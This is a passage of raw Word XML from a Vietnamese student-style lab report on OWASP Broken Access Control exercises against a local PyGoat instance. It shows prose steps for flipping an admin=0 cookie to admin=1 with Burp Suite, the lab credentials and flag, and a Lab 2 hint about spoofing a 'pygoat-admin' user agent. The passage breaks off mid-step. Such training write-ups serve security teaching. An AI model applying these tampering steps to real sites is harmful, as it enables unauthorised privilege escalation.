        <w:t xml:space="preserve"> (Quality Assurance)</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> nên thực hiện kiểm tra chức năng kiểm soát truy cập và kiểm tra tích hợp.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> Trong quá trình phát triển, đội ngũ QA xây dựng các bài kiểm tra để xác minh rằng các chức năng chỉ có thể truy cập bởi người dùng có quyền phù hợp. </w:t>
      </w:r>
      <w:r w:rsidR="003C7D81" w:rsidRPr="004D4BC1">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>ột bài kiểm tra có thể bao gồm việc cố gắng truy cập vào trang quản trị với tài khoản người dùng thông thường và xác nhận rằng truy cập bị từ chối. Các kiểm tra này sẽ được thực hiện tự động trong quá trình kiểm thử tích hợp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2ACD2" w14:textId="2579D974" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc182909825"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="205D04D5" w14:textId="63A0F29C" w:rsidR="00342AD6" w:rsidRDefault="00151DDF" w:rsidP="009D0400">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc182909826"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành</w:t>
      </w:r>
      <w:r w:rsidR="00031203" w:rsidRPr="00031203">
        <w:t xml:space="preserve"> – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="074B92FC" w14:textId="367C3563" w:rsidR="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C26C3" w14:textId="070509CD" w:rsidR="00D12B8F" w:rsidRPr="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00D12B8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D12B8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:t xml:space="preserve"> OSWAP TOP 10 2021 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:t xml:space="preserve"> A1: Broken Access Control </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:t xml:space="preserve"> Lab 1 Details </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:t xml:space="preserve"> Access Lab 1. ( </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00D12B8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/broken_access_lab_1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12B8F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13407021" w14:textId="04264D34" w:rsidR="00D12B8F" w:rsidRPr="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6C7D49" wp14:editId="1CE224A4">
            <wp:extent cx="6151880" cy="2564130"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:docPr id="101611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1164" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="2564130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A5120" w14:textId="19D4801B" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>Broken Access Control – Lab 1</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6FFCE" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>Đăng nhập gặp vấn đề khi thực hiện sử dụng repeater để gửi thông tin lên trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0711B" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFE889" w14:textId="79508021" w:rsidR="009D0400" w:rsidRPr="004D4BC1" w:rsidRDefault="004D4BC1" w:rsidP="004D4BC1">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00067F0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">hử đăng nhập bằng tài khoản </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="004D4BC1">
        <w:t>jack</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> nhưng nhận được kết quả không như mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB88D70" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="004D4BC1" w:rsidRDefault="009D0400" w:rsidP="004D4BC1">
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB9A297" wp14:editId="7E9F59F0">
            <wp:extent cx="6115050" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22427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77027" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2369185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7916C7F8" w14:textId="4895BAFE" w:rsidR="009D0400" w:rsidRPr="004D4BC1" w:rsidRDefault="004D4BC1" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00A45107">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="004D4BC1">
        <w:t>hực hiện bắt gói tin khi gửi lên server và quan sát kết quả thấy rằng trường admin=0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A025D77" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="002B6FD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424A3949" wp14:editId="34846AFB">
            <wp:extent cx="6115050" cy="3187700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1179128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28147" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3187700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C89F7B" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="002B6FD4" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00193A46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5708E145" wp14:editId="0AB6F5DA">
            <wp:extent cx="6115050" cy="2239010"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="2024895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95514" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2239010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B1842" w14:textId="04F2AA1F" w:rsidR="009D0400" w:rsidRPr="004D4BC1" w:rsidRDefault="004D4BC1" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00067F0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">hay đổi trường admin=1 vào phần cookie vào gửi lên server lại. Kết quả nhận được </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="004D4BC1">
        <w:t>key: 0NLY_F0R_4DM1N5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE8F5E" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00193A46" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00193A46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2802613F" wp14:editId="7E597870">
            <wp:extent cx="6115050" cy="3216910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1455115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15736" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3216910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="405467B0" w14:textId="6FB02521" w:rsidR="009D0400" w:rsidRPr="004D4BC1" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t>High (cao)</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> vì cho phép kẻ tấn công thay đổi trực tiếp quyền truy cập từ phía máy khách thông qua việc sửa đổi giá trị trong cookie mà không cần xác thực tại máy chủ. Điều này có thể dẫn đến tình trạng kẻ tấn công truy cập được các thông tin nhạy cảm hoặc thực hiện các hành động chỉ dành cho người dùng có quyền admin. Nếu lỗ hổng không được xử lý, nó sẽ tạo ra rủi ro nghiêm trọng cho bảo mật và có khả năng gây thiệt hại lớn về mặt thông tin, tài chính, và uy tín của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A011079" w14:textId="5935B83D" w:rsidR="009D0400" w:rsidRPr="00067F0D" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>Các ứng dụng web nên xác thực quyền truy cập tại máy chủ (server) hơn là máy khách (client) để kẻ tấn công (attacker) không giả mạo được và nên thực hiện kiểm tra an ninh ở nhiều cấp độ để vá lỗ hổng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA0DFA" w14:textId="0055197B" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc182909827"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="182E0E01" w14:textId="062709D9" w:rsidR="00D12B8F" w:rsidRPr="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00D12B8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/broken_access_lab_2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F154F58" w14:textId="08433B51" w:rsidR="00724CB8" w:rsidRPr="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00067F0D">
        <w:t>Broken Access Control – Lab 2</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48637C26" w14:textId="03001830" w:rsidR="00724CB8" w:rsidRPr="00067F0D" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00067F0D" w:rsidRPr="004D4BC1">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">ỗi khi </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">điều chỉnh trên gói tin, </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>đăng nhập với quyền admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBEA3B" w14:textId="4E8861D9" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C0783" w14:textId="63D77319" w:rsidR="00724CB8" w:rsidRPr="007D4FFF" w:rsidRDefault="004D4BC1" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="004D4BC1">
        <w:t>Truy cập và task thì nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58ECA6" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="007D4FFF" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="007D4FFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1E89B8" wp14:editId="4D9611FD">
            <wp:extent cx="6115050" cy="2675255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1356479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79168" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2675255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7BA820" w14:textId="4BCCA01D" w:rsidR="00724CB8" w:rsidRPr="007D4FFF" w:rsidRDefault="004D4BC1" w:rsidP="00724CB8">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve">hử nhập </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jack</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jacktheripper</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve"> như lab 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED8501" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="007D4FFF" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="007D4FFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="113CEEF4" wp14:editId="69A7CA86">
            <wp:extent cx="6115050" cy="2425065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1643859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59259" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2425065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="521445BD" w14:textId="04275AD8" w:rsidR="00724CB8" w:rsidRPr="004D4BC1" w:rsidRDefault="00724CB8" w:rsidP="004D4BC1">
      <w:r w:rsidRPr="004D4BC1">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> Kết quả không như mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC43D59" w14:textId="4532143D" w:rsidR="00724CB8" w:rsidRPr="00067F0D" w:rsidRDefault="004D4BC1" w:rsidP="00067F0D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="004D4BC1">
        <w:t>ùng phần mềm Burp Suite để bắt gói POST Request từ Client lên Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972696D" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00B62C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6511663F" wp14:editId="678C6A7B">
            <wp:extent cx="6115050" cy="2938780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108654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42222" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2938780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35438298" w14:textId="540D282C" w:rsidR="00724CB8" w:rsidRPr="00067F0D" w:rsidRDefault="00724CB8" w:rsidP="00067F0D">
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận xét:</w:t>
      </w:r>
      <w:r w:rsidRPr="00067F0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>hận thấy rằng trường admin sử dụng trình duyệt pygoat-admin nhưng client lại sử dụng Mozilla. Đây là lỗi mà các web developer quên xóa đi comment để lộ thông tin của ghi chú bên phía admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F5CEC4" w14:textId="311FC6FE" w:rsidR="00724CB8" w:rsidRPr="007D4FFF" w:rsidRDefault="004D4BC1" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00067F0D">
        <w:rPr>
          <w:b/>
